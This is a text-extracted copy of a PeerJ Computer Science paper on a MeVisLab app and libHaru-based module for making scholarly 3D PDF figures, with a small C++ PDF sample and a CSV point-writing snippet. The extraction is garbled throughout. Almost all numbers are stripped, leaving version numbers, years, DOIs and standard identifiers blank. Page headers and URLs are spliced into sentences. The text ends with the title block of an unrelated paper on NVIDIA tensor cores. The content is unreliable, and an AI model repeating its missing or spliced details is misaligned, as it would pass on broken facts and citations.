user interfaces that hide the underlying platform and that can simply be used without any programming knowledge (koenig et al., ; heckel, schwier & peitgen, ; ritter et al., ). mevislab has been evaluated as a very good platform for creating application prototypes (bitter et al., ), is very newe ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://www.mevislab.de/download/ http://www.mevislab.de/mevislab/versions-and-licensing/ http://dx.doi.org/ . /peerj-cs. well documented (http://www.mevislab.de/developer/documentation/) and supported by an active online community (http://www.mevislab.de/developer/community/; https://github.com/mevislab/communitymodules/tree/master/community). all algorithms and functions included into mevislab are represented and accessed by ‘‘modules,’’ which can be arranged and connected to image processing networks or data processing networks on a graphical user interface (gui) following the visual data-flow development paradigm. by means of so-called ‘‘macro modules,’’ these networks can then be converted with little effort into complete applications with an own gui. methods elicitation of requirements as described above, the generation of the necessary d model data and particularly of the final pdf is still subject to a number of difficulties. 
therefore, the first step was the creation of a list of requirement specifications with the aim to create a tool that overcomes these known drawbacks. two requirements have been identified to be the most important ones: ( ) the demand for a tool that creates ‘‘ready-to-publish’’ pdf documents without the need for commercial software and ( ) the integration of all necessary steps into a single and easy-to-use interface. beside these two main requirements, a number of additional requirements have then been identified as well. see table for a full list of all requirements that were the basis for the following development. creation of an “app” for mevislab mevislab-based solutions presented in previous work (newe & ganslandt, ; newe, ) already provide the possibility to create u d files without requiring programming skills and without the need for an intensive training. however, they still needed some basic training as regards assembling the necessary processing chains in mevislab. furthermore, the creation of the final pdf was not possible so far. therefore, a new macro module was created for mevislab. a macro module encapsulates complex processing networks and can provide an integrated user interface. in this way, the internal processes can be hidden away from the user, who can focus on a streamlined workflow instead. designed in an appropriate way, a macro module can also be considered as an ‘‘app’’ inside of mevislab. in order to provide the necessary functionality, some auxiliary tool modules (e.g., for the creation of the actual pdf file) needed to be developed as well. along with the modules for u d export mentioned above, these auxiliary tool modules were integrated into the internal processing network of the main ‘‘app’’ macro. the technical details of these internal modules are not within the scope of this article. however, the source code is available and interested readers are free to explore the code and to use it for own projects. the user interface of the app was designed in a way that it guides novice users step-by-step without treating experienced users too condescendingly, though. finally, a comprehensive documentation including an example project, a wizard for creating tailored pdf modules and a verbose help text was set up. newe ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://www.mevislab.de/developer/documentation/ http://www.mevislab.de/developer/community/ https://github.com/mevislab/communitymodules/tree/master/community http://dx.doi.org/ . /peerj-cs. table requirements for the development of the software tool. the two main requirements are high- lighted in bold font. id requirement specification r the software shall create ready-to-publish pdf documents with embedded d models. r . the software shall offer an option to specify the activation mode and the deactivation mode for the d models. r the software shall provide an integrated, single-window user interface that comprises all necessary steps. r the software shall be executable under windows, macos and at least one linux distribution. r the software shall be executable without the need to purchase a commerical license. r the software shall create d model files in u d format. r . the software shall create view definitions for the d model. r . the software shall create poster images for the pdf document. r the software shall import mesh geometry from files in obj, stl and ply format. r . the software should import mesh geometry from other file formats as well. r . 
the software shall offer an option to reduce the number of triangles of imported meshes. r . the software shall offer an option to specify the u d object name and the color of imported meshes. r the software shall import line set geometry from files in text format. r . the software shall offer an option to specify the u d object name and the color of imported line sets. r the software shall import point set geometry from files in text format. r . the software shall offer an option to specify the u d object name of imported point sets. deployment of core functionality for the creation of the actual pdf files, version . . of the cross-platform, open source library libharu (http://libharu.org/) was selected, slightly modified and integrated as third-party contribution into mevislab. next, the application programming interface (api) of libharu was wrapped into an abstract base module for mevislab in order to provide an easy access to all functions of the library and in order to hide away standard tasks like creating a document or releasing memory. a large number of convenience functions were added to this base module and an exemplary mevislab project was set up in order to demonstrate how to use the base module for tailored applications. this base module also served as basis for the pdf creation of the app macro described above. finally, a project wizard was integrated into the mevislab gui. newe ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://libharu.org/ http://dx.doi.org/ . /peerj-cs. figure user interface of the app. the user interface comprises all necessary steps for the creation of d model files and pdf files. it is arranged in tabs for each step. results the “scientific dfigurepdfapp” module the new macro module ‘‘scientific dfigurepdfapp’’ for mevislab provides an integrated user interface for all steps that are necessary for the creation of u d model files and for the creation of the final pdf documents with embedded d models. the model editor part produces u d model files of geometry data that are compatible with version of the ecma- standard and poster images in portable network graphics (png) format. the pdf editor part produces pdf documents that are compliant with pdf version . (iso - : ). an example pdf is available as file s . the user interface is arranged in tabs, whereas each tab comprises all functions for one step of the workflow. by processing the tabs consecutively, the user can assemble and modify d models, save them in u d format, create views and poster images for the pdf document, and finally create the pdf itself step by step (fig. ). the raw model data can be collected in two ways: either by feeding it to the input connectors or by assembling it by means of the built-in assistant. the former option is intended for experienced mevislab users that want to attach the module at the end of a processing chain. the latter option addresses users that simply want to apply the app for converting existing d models and for creating an interactive figure for scholar publishing. newe ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. table list of supported d formats for importing geometry data (textures, animations and other features are not supported). 
file format typical file extension(s) stereolithography *.stl stanford polygon library *.ply wavefront object *.obj object file format *.off blender *.blend raw triangles *.raw raw point clouds *.csv; *.txt raw line sets *.csv; *.txt d gamestudio *.mdl; *.hmp d studio max *. ds; *.ase ac d *.ac autocad/autodesk *.dxf biovision bvh *.bvh characterstudio motion *.csm collada *.dae; *.xml directx x *.x doom *.md mesh; *.md anim; *.md camera irrlicht *.irrmesh; *.irr; *.xml lightwave *.lwo; *.lws milkshape d *.ms d modo model *.lxo neutral file format *.nff ogre *.mesh.xml; *.skeleton.xml; *.material quake i, quake ii, quake iii *.mdl; *.md ; *.md ; *.pk quick d *.q o; *q s rtcw *.mdc sense worldtoolkit *.nff terragen terrain *.ter truespace *.cob; *.scn valve model *.smd; *.vta xgl *.xgl; *.zgl the software allows for importing the geometry data of different d formats, including point clouds and line sets from files in character-separated value (csv) format (see table for a full list). the import of textures and animations is not supported. objects from different sources can be combined and their u d properties (colour, name, position in the object tree) can be specified. the density of imported meshes can be adjusted interactively and multiple views (i.e., the specification of camera, lighting and render mode) can be pre-defined interactively as well. finally, it is also possible to create a poster image which can replace an inactive d model in the pdf document if the model itself is disabled or if it cannot be displayed for some reason (e.g., because the reading software does not provide the necessary features). newe ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table list of features. category features data import import external data, import mevislab data, import point clouds, import line sets, import meshes from file formats, adjust mesh density, preview import point cloud editing specify point cloud name, specify position in model tree, preview settings line set editing specify line set name, specify position in model tree, specify colour, preview settings mesh editing specify mesh name, specify position in model tree, specify colour, specify opacity, preview settings view specification specify view name, specify background colour, specify lighting scheme, specify render mode, preview settings, specify multiple views u d creation store model in u d format, preview scene poster image creation store poster in png format, preview scene, specify superimposed text pdf creation store document in pdf (v . ) format, specify header citation text, specify header headline text, specify u d file, specify poster file, specify model activation mode, specify model deactivation mode, specify toolbar enabling, specify navigation bar enabling, specify animation start mode, specify caption, specify description text all functions are explained in detail in a comprehensive documentation which can be accessed directly inside mevislab. a stand-alone copy of the documentation is available as file s . in order to use the app, it simply needs to be instantiated (via the mevislab menu: modules → pdf → apps → scientific dfigurepdfapp). a full feature list is available in table . additional features for tailored pdf creation the abstract module which wraps the api of the pdf library libharu into a mevislab module was made public (‘‘pdfgenerator’’ module) and can be used for the development of tailored mevislab modules. 
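to make the role of the wrapped libharu api more concrete, the following minimal c++ sketch creates a one-page pdf with the plain libharu calls (hpdf_new, hpdf_addpage, hpdf_page_textout, hpdf_savetofile). it only illustrates the library that the pdfgenerator module wraps: the file name and the text strings are invented for the example, and the calls needed to embed a u3d model as a 3d annotation (which require the modified libharu integrated into mevislab) are not shown.

```cpp
// Minimal libHaru example: create a one-page PDF with a headline and a caption.
// This illustrates the plain libHaru API that the PDFGenerator module wraps;
// embedding a U3D model as a 3D annotation is not shown here.
#include <hpdf.h>
#include <cstdio>

int main() {
    HPDF_Doc pdf = HPDF_New(nullptr, nullptr);   // default error handling
    if (!pdf) {
        std::fprintf(stderr, "could not create PDF document\n");
        return 1;
    }

    HPDF_Page page = HPDF_AddPage(pdf);
    HPDF_Page_SetSize(page, HPDF_PAGE_SIZE_A4, HPDF_PAGE_PORTRAIT);

    HPDF_Font font = HPDF_GetFont(pdf, "Helvetica", nullptr);

    // Headline (one of the five key elements of a scholarly figure).
    HPDF_Page_BeginText(page);
    HPDF_Page_SetFontAndSize(page, font, 16);
    HPDF_Page_TextOut(page, 50, 780, "Supplemental Figure S1");   // example text
    HPDF_Page_EndText(page);

    // Caption text below the (here omitted) figure area.
    HPDF_Page_BeginText(page);
    HPDF_Page_SetFontAndSize(page, font, 10);
    HPDF_Page_TextOut(page, 50, 100, "Interactive 3D model of the specimen.");
    HPDF_Page_EndText(page);

    if (HPDF_SaveToFile(pdf, "figure.pdf") != HPDF_OK) {   // hypothetical file name
        std::fprintf(stderr, "could not save PDF file\n");
    }
    HPDF_Free(pdf);
    return 0;
}
```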
in order to facilitate the re-use of this abstract base module, an exemplary project was set up (/projects/pdfexamples/savepdftemplate). this project demonstrates how to derive a customized module from the pdfgenerator base module and how to specify the content of the pdf file that will be created by means of the new module. the template code is verbosely annotated and includes examples for setting pdf properties (e.g., meta data, page size, encryption) as well as the document content (including text, images, graphics and d models). the output of the savepdftemplate module is illustrated in fig. . finally, a project wizard was integrated into the mevislab gui. it can be accessed via the mevislab menu: file → run project wizard...→ pdf module. the wizard consists of three steps (fig. ) whereof the second step offers the possibility to include demo code which produces the same pdf file as the savepdftemplate module described above. the general usage of project wizards in mevislab is explained in chapter of the mevislab newe ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. figure output of the savepdftemplate module. newe ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure project wizard for creating customized pdf modules. manual (menu: help → browse help pages → using mevislab → mevislab reference manual). availability the whole pdf project for mevislab (which includes the scientific dfigurepdfapp, the pdfgenerator base module, the savepdftemplate project, the project wizard and all source code files) is available for microsoft windows, macos and linux (tested with ubuntu . . ). it requires mevislab . or a later version (http://www.mevislab.de/download/). the windows version of mevislab is available for four compiler versions. this is relevant only if the source code is intended to be compiled manually (see below). there are two approaches to add the app and the other elements to an existing mevislab installation: add-on installers and the online repository of the mevislab community sources. installers are self-contained, executable archives that automatically add all necessary files to an existing mevislab installation. the target groups for these installers are mevislab newcomers and pure users that want to use the scientific dfigurepdfapp out-of-the-box. the current version of the installers for all operating systems and all -bit compiler versions can be downloaded from the research data repository zenodo ( . /zenodo. ). installers for the previous version of mevislab ( . . ) are available as well ( . /zenodo. ), but this version will not be supported in the future. updates will be made available via zenodo as well. a dedicated zenodo community collection named ‘‘three-dimensional portable document format ( d pdf) in science’’ has been set up for this purpose (https://zenodo.org/collection/user- d-pdf). all those who are interested in being able to always use the latest version should connect their mevislab installation with the community sources which are hosted at github (https://github.com/mevislab/communitymodules/tree/master/community). this approach, however, requires compiling the source code and is intended only for experienced users or for users that are willing to become acquainted with mevislab. note newe ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://www.mevislab.de/download/ http://dx.doi.org/ . /zenodo. 
http://dx.doi.org/ . /zenodo. https://zenodo.org/collection/user- d-pdf https://github.com/mevislab/communitymodules/tree/master/community http://dx.doi.org/ . /peerj-cs. that there are multiple versions available for windows, depending on the compiler that is intended to be used. discussion a toolbox for the creation of d pdfs the utilization of d pdf technology for scholarly publishing has been revealed and proven both useful and necessary by several authors in the past years. the mainstream application of d pdf in science, however, is yet to come. one reason might be the difficult process that has so far been necessary to create appropriate data and relevant electronic documents. this article presents an all-in-one solution for the creation of such files which requires no extraordinary skills. it can be used by low-end users as an out-of-the-box tool as well as a basis for sophisticated tailored solutions for high-end users. many typical problems as regards the creation of d model files have been addressed and solved. all steps of the workflow are integrated seamlessly. the software is available for all os platforms and can import and process objects from many popular d formats, including polylines and point clouds (table ). the density of imported meshes can be adjusted interactively which enables the user to find the best balance between the desired level of detail and the file size. the main contribution, however, is the possibility to create ready-to-publish pdf documents with a minimum of steps. this approach was proposed to be the ideal solution by kumar et al. ( ). to best knowledge, this is the first time that such an integrated and comprehensive solution is made available for the scientific community. applications the areas of application (see an example in file s ) are manifold and not limited to a specific scientific discipline. on the contrary: every field of research that produces three-dimensional data can and should harness this technology in order to get the best out of that data. one (arbitrary) example for the possible use of mesh models from the recent literature is d ultrasound. dahdouh et al. ( ) recently published about the results of segmentation of obstetric d ultrasound images. that article contains several figures that project three- dimensional models on the available two-dimensional surface. a presentation in native d would have enabled the reader to interactively explore the whole models instead of just one pre-defined snapshot. another example is the visualization of molecular structures as demonstrated by kumar et al. ( ). polylines can be used to illustrate nervous fibre tracking. mitter et al., ( ) used d projections of association fibres in the foetal brain to visualize their results. a real d visualization would have been very helpful in this case as well: while some basic knowledge about a depicted object helps to understand d projections of d structures, the possibility to preserve at least a little depth perception decreases with an increasing level of abstraction (mesh objects vs. polylines). newe ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. this particularly applies to point clouds which can be observed, for example, in an article by qin et al. ( ): although these authors added three-dimensional axes to their figure (no. ) it is still hard to get an impression of depth and therefore of the real position of the points in d space. 
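since the app imports point sets and line sets from plain text (csv) files, data like the point clouds just mentioned can be prepared with a few lines of code. the sketch below writes a helix as one x,y,z triple per line; the file name and the assumption that a simple x,y,z column layout is accepted are mine, since the exact format expected by the importer is described in the module documentation rather than here.

```cpp
// Write a simple 3D point cloud (a helix) as CSV text, one "x,y,z" per line.
// Assumption: the importer accepts plain x,y,z rows; the file name is an example.
#include <cmath>
#include <fstream>

int main() {
    std::ofstream out("helix_points.csv");
    const int n = 500;
    for (int i = 0; i < n; ++i) {
        const double t = 0.05 * i;   // parameter along the helix
        const double x = std::cos(t);
        const double y = std::sin(t);
        const double z = 0.02 * i;   // slowly increasing height
        out << x << ',' << y << ',' << z << '\n';
    }
    return 0;
}
```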
limitations although the presented software pulls down the major thresholds that impede the creation of interactive figures for scholarly publishing, some limitations still need to be considered. a general concern is the suitability of pdf as a means to visualize and to exchange d models. pdf and u d (or prc) do not support all features that other modern d formats provide and that would be of interest for the scientific community (e.g., volumetric models). on the other hand, pdf is commonly accepted and de-facto the only file format that is used for the electronic exchange of scholarly articles. therefore, pdf may not be the perfect solution, but it is the best solution that is currently available. the presented software requires mevislab as background framework and the installation of mevislab requires a medium-sized download of about gb (depending on the operating system), which could be considered rather large for a pdf creator. on the other hand, mevislab integrates a large library for the processing and the visualization of (biomedical) image data. furthermore, other frameworks (like meshlab) do not provide all necessary features (e.g., polylines or point clouds) and therefore were not considered to meet basic requirements for the development of the software tool. the import of d models is based on the open asset import library (http: //www.assimp.org/) which does not support all features of all d formats. for example, textures and animations cannot be imported and should thus not be embedded into a model file that is intended to be imported. however, although the model-editor part of the presented software does not support textures (or animations), the pdf-creator part can still be used to produce scientific pdfs with textured or animated models, if the necessary u d files have been created with external and more specialized software. in this use case, the scientific dfigurepdfapp does not integrate all necessary steps, but it still remains a ‘‘few-clicks’’ alternative for the creation of interactive pdf supplements for scientific publications and it still obviates the need for a commercial solution. finally, very large model files should be avoided. if a large model fails to import, it should be separated into several sub-models. a mesh reduction can be applied after the import, but a previously reduced mesh speeds up the import process. suitable reading software the adobe reader (http://get.adobe.com/reader/otherversions/) is available free of charge for all major operating systems (ms windows, mac os, linux). it is currently the only software that can be used to display embedded d models and to let the user interact with them (zooming, panning, rotating, selection of components). however, even the adobe reader does not support all u d features (adobe, ), e.g., glyphs and view nodes. furthermore, a rendering flaw has been observed on low-end graphic boards in macos hardware (fig. ). adobe reader for macos does not render transparent surfaces newe ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://www.assimp.org/ http://www.assimp.org/ http://get.adobe.com/reader/otherversions/ http://dx.doi.org/ . /peerj-cs. figure rendering artifacts. these tessellation artifacts have been observed on macos systems with low-end graphic hardware. superimposed upon each other correctly: instead, a strong tessellation effect is visible. this may also occur on other platforms but has not been reported yet. 
since this is an issue with the rendering engine of adobe reader, there is currently no other solution than using a different render mode (e.g., one of the wireframe modes) or different hardware. experience shows that many users do not expect a pdf document to be interactive. therefore, possible consumers should be notified that it is possible to interact with the document and they should also be notified that the original adobe reader is required for this. although poster images are a workaround to avoid free areas in pdf readers that are not capable of rendering d scenes, missing d features of a certain reader could be confusing for a user. a basis for own modules as pointed out in previous work (newe, ), the authoring of a pdf document is usually a complex task and thus in most cases it cannot be avoided to separate the generation of d model data from the actual pdf authoring. although the software tool presented in this article mitigates this general problem by integrating model generation and pdf creation, it is still limited to a certain use case and a pre-defined pdf layout. however, the api of the core pdf functionality is public and designed in a way that facilitates the creation of own pdf export modules. the large number of convenience functions for the abstract base module (pdfgenerator) facilitates the creation of derived modules. these functions massively lighten the programmer’s workload by providing a simple access to routine tasks like writing text at a defined position or like embedding a d model which would normally require a whole series of api calls. finally, the built-in newe ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. wizard generates all necessary project files and source code files to create a fully functional module barebone which only needs to be outfitted with the desired functionality. outlook although this article represents an important milestone, the development of the pdf project for mevislab is ongoing. future goals are the integration of virtual volume rendering (barnes et al., ), animations (van de kamp et al., ) and the parsing of u d files that have been created with external software. the progress can be tracked via github (https://github.com/mevislab/communitymodules/tree/master/community) and updates to the binary files will be published regularly. conclusion three-dimensional data is produced at an increasing rate throughout all scientific disciplines. the portable document format is a well-suited medium for the visualization and the publication of this kind of data. with the software presented in this article, the complete workflow for generating d model files and d pdf documents for scholarly publications can be processed in a consolidated working environment, free of license costs and with all major operating systems. the software addresses novices as well as experienced users: on the one hand, it provides an out-of-the-box solution that can be used like a stand-alone application, and on the other hand, all sources and apis are freely available for specifically tailored extensions. 
list of abbreviations d two-dimensional d three-dimensional pdf portable document format iso international organization for standardization u d universal d prc product representation compact cad computer aided construction ecma european computer manufacturers association gui graphical user interface api application programming interface png portable network graphics csv character-separated value, comma-separated value acknowledgements thanks to dr. hans meine, fraunhofer mevis, bremen, germany, for compiling the code for macos and linux and for building installers. thanks to dr. thomas van de kamp, karlsruhe institute of technology, karlsruhe, germany, for providing test data. newe ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://github.com/mevislab/communitymodules/tree/master/community http://dx.doi.org/ . /peerj-cs. additional information and declarations funding the author received no funding for this work. competing interests the author declares there is no competing interests. author contributions • axel newe conceived and designed the experiments, contributed reagents/materials/anal- ysis tools, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper, implemented the software. data availability the following information was supplied regarding data availability: https://github.com/mevislab/communitymodules/tree/master/community/general; . /zenodo. ; . /zenodo. . supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. references adobe systems incorporated (adobe) . pdf reference, fifth edition, adobe portable document format, version . . available at http://wwwimages.adobe.com/content/ dam/adobe/en/devnet/pdf/pdfs/pdf_reference_archives/pdfreference .pdf (accessed may ). archived at http://www.webcitation.org/ gunindkd. adobe systems incorporated (adobe) . adobe announces acrobat . software availability. available at https://www.adobe.com/aboutadobe/pressroom/pressreleases/ / acrobat.html (accessed may ). archived at http://www. webcitation.org/ gunqpxoe. adobe systems incorporated (adobe) . u d supported elements. available at http: //www.adobe.com/content/dam/adobe/en/devnet/acrobat/pdfs/u delements.pdf (accessed may ). archived at http://www.webcitation.org/ eu dnbj. adobe systems incorporated (adobe) a. document management—portable document format—part : pdf . . available at http://wwwimages.adobe.com/ content/dam/adobe/en/devnet/pdf/pdfs/pdf _ .pdf (accessed may ). archived at http://www.webcitation.org/ s xkrvpw. adobe systems incorporated (adobe) b. adobe r© supplement to the iso , baseversion: . , extensionlevel: . available at http://wwwimages.adobe.com/ content/dam/adobe/en/devnet/pdf/pdfs/adobe_supplement_iso .pdf (accessed may ). archived at http://www.webcitation.org/ gunw iyd. newe ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://github.com/mevislab/communitymodules/tree/master/community/general http://dx.doi.org/ . /zenodo. http://dx.doi.org/ . /zenodo. http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. 
#supplemental-information http://wwwimages.adobe.com/content/dam/adobe/en/devnet/pdf/pdfs/pdf_reference_archives/pdfreference .pdf http://wwwimages.adobe.com/content/dam/adobe/en/devnet/pdf/pdfs/pdf_reference_archives/pdfreference .pdf http://www.webcitation.org/ gunindkd https://www.adobe.com/aboutadobe/pressroom/pressreleases/ / acrobat.html https://www.adobe.com/aboutadobe/pressroom/pressreleases/ / acrobat.html http://www.webcitation.org/ gunqpxoe http://www.webcitation.org/ gunqpxoe http://www.adobe.com/content/dam/adobe/en/devnet/acrobat/pdfs/u delements.pdf http://www.adobe.com/content/dam/adobe/en/devnet/acrobat/pdfs/u delements.pdf http://www.webcitation.org/ eu dnbj http://wwwimages.adobe.com/content/dam/adobe/en/devnet/pdf/pdfs/pdf _ .pdf http://wwwimages.adobe.com/content/dam/adobe/en/devnet/pdf/pdfs/pdf _ .pdf http://www.webcitation.org/ s xkrvpw http://wwwimages.adobe.com/content/dam/adobe/en/devnet/pdf/pdfs/adobe_supplement_iso .pdf http://wwwimages.adobe.com/content/dam/adobe/en/devnet/pdf/pdfs/adobe_supplement_iso .pdf http://www.webcitation.org/ gunw iyd http://dx.doi.org/ . /peerj-cs. adobe systems incorporated (adobe) . adobe—pdf: the global standard for trusted, electronic documents and forms. available at http://www.adobe.com/au/ pdf/about/history/ (accessed may ). archived at http://www.webcitation.org/ etx arad. adobe systems incorporated (adobe) . pdf reference and adobe extensions to the pdf specification. available at http://www.adobe.com/devnet/pdf/pdf_reference.edu. html (accessed may ). archived at http://www.webcitation.org/ s y shjg. barnes dg, fluke cj. . incorporating interactive -dimensional graphics in astronomy research papers. new astronomy ( ): – doi . /j.newast. . . . barnes dg, vidiassov m, ruthensteiner b, fluke cj, quayle mr, mchenry cr. . embedding and publishing interactive, -dimensional, scientificfigures in portable document format (pdf) files. plos one ( ):e doi . /journal.pone. . bitter i, van uitert r, wolf i, ibanez l, kuhnigk jm. . comparison of four freely available frameworks for image processing and visualization that use itk. ieee transactions on visualization and computer graphics ( ): – doi . /tvcg. . . dahdouh s, angelini ed, grangé g, bloch i. . segmentation of embryonic and fetal d ultrasound images based on pixel intensity distributions and shape priors. medical image analysis ( ): – doi . /j.media. . . . danz jc, katsaros c. . three-dimensional portable document format: a sim- ple way to present -dimensional data in an electronic publication. amer- ican journal of orthodontics and dentofacial orthopedics ( ): – doi . /j.ajodo. . . . ecma international (ecma). . standard ecma- , universal d file format, th edition (june ). available at available at http://www.ecma-international.org/cgi- bin/counters/unicounter.pl?na%me=ecma- _ thedition&deliver=http://www. ecma-international.org/publications/files/ecma-st/ecma- % th% edition. pdf (accessed may ). archived at: available at http://www.webcitation.org/ qki nqn. elsevier. . interactive u d models. available at http://www.elsevier.com/about/ content-innovation/u d-models (accessed may ). archived at http://www. webcitation.org/ etxa hgv . grahn a. . the movie package. available at http://solar.physics.montana.edu/ kankel/ph /resources/latex/graphics-animations/movie .pdf (accessed may ). archived at http://www.webcitation.org/ etzfqj v. heckel f, schwier m, peitgen ho. . object oriented application development with mevislab and python. 
in: lecture notes in informatics (informatik : im focus das leben). bonn: gesellschaft fuer informatik, – . hugh-jones p. . diabetes in jamaica. the lancet ( ): – doi . /s - ( ) - . newe ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://www.adobe.com/au/pdf/about/history/ http://www.adobe.com/au/pdf/about/history/ http://www.webcitation.org/ etx arad http://www.webcitation.org/ etx arad http://www.adobe.com/devnet/pdf/pdf_ reference.edu.html http://www.adobe.com/devnet/pdf/pdf_ reference.edu.html http://www.webcitation.org/ s y shjg http://dx.doi.org/ . /j.newast. . . http://dx.doi.org/ . /journal.pone. http://dx.doi.org/ . /tvcg. . http://dx.doi.org/ . /tvcg. . http://dx.doi.org/ . /j.media. . . http://dx.doi.org/ . /j.ajodo. . . http://dx.doi.org/ . /j.ajodo. . . http://www.ecma-international.org/cgi-bin/counters/unicounter.pl?na% me=ecma- _ thedition&deliver=http://www.ecma-international.org/publications/files/ecma-st/ecma- % th% edition.pdf http://www.ecma-international.org/cgi-bin/counters/unicounter.pl?na% me=ecma- _ thedition&deliver=http://www.ecma-international.org/publications/files/ecma-st/ecma- % th% edition.pdf http://www.ecma-international.org/cgi-bin/counters/unicounter.pl?na% me=ecma- _ thedition&deliver=http://www.ecma-international.org/publications/files/ecma-st/ecma- % th% edition.pdf http://www.ecma-international.org/cgi-bin/counters/unicounter.pl?na% me=ecma- _ thedition&deliver=http://www.ecma-international.org/publications/files/ecma-st/ecma- % th% edition.pdf http://www.webcitation.org/ qki nqn http://www.webcitation.org/ qki nqn http://www.elsevier.com/about/content-innovation/u d-models http://www.elsevier.com/about/content-innovation/u d-models http://www.webcitation.org/ etxa hgv http://www.webcitation.org/ etxa hgv http://solar.physics.montana.edu/kankel/ph /resources/latex/graphics-animations/movie .pdf http://solar.physics.montana.edu/kankel/ph /resources/latex/graphics-animations/movie .pdf http://www.webcitation.org/ etzfqj v http://dx.doi.org/ . /s - ( ) - http://dx.doi.org/ . /peerj-cs. hurd jm. . the transformation of scientific communication: a model for . jour- nal of the american society for information science and technology ( ): – doi . / - ( ) : . .co; - . international organization for standardization (iso). . iso - : document management—portable document format—part : pdf . . available at http://www.iso.org/iso/iso_catalogue/catalogue_tc/catalogue_detail.htm?csnumbe= (accessed may ). archived at http://www.webcitation.org/ qkfzgvk . international organization for standardization (iso). . iso/dis - review guide. available at http://www.pdfa.org/wp-content/uploads/ / /iso- - _dis- _review_only.pdf (accessed may ). archived at http://www. webcitation.org/ byqjvkas. koenig m, spindler w, rexilius j, jomier j, link f, peitgen ho. . embedding vtk and itk into a visual programming and rapid prototyping platform. in: proceedings of spie, medical imaging : visualization, image-guided procedures, and display. bellingham: spie. krause dw, wible jr, hoffmann s, groenke jr, o’connor pm, holloway wl, rossie jb. . craniofacial morphology of vintana sertichi (mammalia, gondwanathe- ria) from the late cretaceous of madagascar. journal of vertebrate paleontology (supplement ): – doi . / . . . kumar p, ziegler a, grahn a, hee cs, ziegler a. . leaving the structural ivory tower, assisted by interactive d pdf. trends in biochemical sciences ( ): – doi . /j.tibs. . . . kumar p, ziegler a, ziegler j, uchanska-ziegler b, ziegler a. . 
grasping molecular structures through publication-integrated d models. trends in biochemical sciences ( ): – doi . /j.tibs. . . . lautenschlager s. . palaeontology in the third dimension: a comprehensive guide for the integration of three-dimensional content in publications. paläontologische zeitschrift ( ): – doi . /s - - - . maunsell j. . announcement regarding supplemental material. journal of neuro- science ( ): – . mitter c, prayer d, brugger pc, weber m, kasprian g. . in vivo tractography of fetal association. plos one ( ):e doi . /journal.pone. . newe a. . towards an easier creation of three-dimensional data for embedding into scholarly d pdf (portable document format) files. peerj :e doi . /peerj. . newe a, becker l, schenk a. . application and evaluation of interactive d pdf for presenting and sharing planning results for liver surgery in clinical routine. plos one ( ):e doi . /journal.pone. . newe a, ganslandt t. . simplified generation of biomedical d surface model data forembedding into d portable document format (pdf) files for publication and education. plos one ( ):e doi . /journal.pone. . newe ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . / - ( ) : . .co; - http://dx.doi.org/ . / - ( ) : . .co; - http://www.iso.org/iso/iso_ catalogue/catalogue_tc/catalogue_detail.htm?csnumber= http://www.iso.org/iso/iso_ catalogue/catalogue_tc/catalogue_detail.htm?csnumber= http://www.webcitation.org/ qkfzgvk http://www.pdfa.org/wp-content/uploads/ / /iso- - _dis- _ review_ only.pdf http://www.pdfa.org/wp-content/uploads/ / /iso- - _dis- _ review_ only.pdf http://www.webcitation.org/ byqjvkas http://www.webcitation.org/ byqjvkas http://dx.doi.org/ . / . . http://dx.doi.org/ . /j.tibs. . . http://dx.doi.org/ . /j.tibs. . . http://dx.doi.org/ . /j.tibs. . . http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /journal.pone. http://dx.doi.org/ . /peerj. http://dx.doi.org/ . /journal.pone. http://dx.doi.org/ . /journal.pone. http://dx.doi.org/ . /peerj-cs. phelps a, naeger dm, marcovici p. . embedding d radiology models in portable document format. american journal of roentgenology ( ): – doi . /ajr. . . qin y, yao w, vu tt, li s, niu z, ban y. . characterizing radiometric attributes of point cloud using anormalized reflective factor derived from small footprint lidar waveform. ieee journal of selected topics in applied earth observations and remote sensing ( ): – doi . /jstars. . . ritter f, boskamp t, homeyer a, laue h, schwier m, link f, peitgen ho. . medical image analysis. ieee pulse ( ): – doi . /mpul. . . ruthensteiner b, heß m. . embedding d models of biological specimens in pdf publications. microscopy research and technique ( ): – doi . /jemt. . thoma gr, ford g, antani s, demner-fushman d, chung m, simpson m. . interactive publication: the document as a research tool. web semantics ( – ): – doi . /j.websem. . . . tory m, möller t. . human factors in visualization research. ieee transactions on visualization and computer graphics ( ): – doi . /tvcg. . . van de kamp t, dos santos rolo t, vagovic p, baumbach t, riedel a. . three- dimensional reconstructions come to life—interactive d pdf animations in func- tional morphology. plos one ( ):e doi . /journal.pone. . zlatanova s, verbree e. . the third dimension in lbs: the steps to go. in: pro- ceedings of the rd symposium on location based services & telecartography, – november , vienna, austria, – . newe ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /ajr. . 
numerical behavior of nvidia tensor cores
massimiliano fasi, nicholas j. higham, mantas mikaitis and srikara pranesh
school of science and technology, Örebro university, Örebro, sweden; department of mathematics, university of manchester, manchester, uk
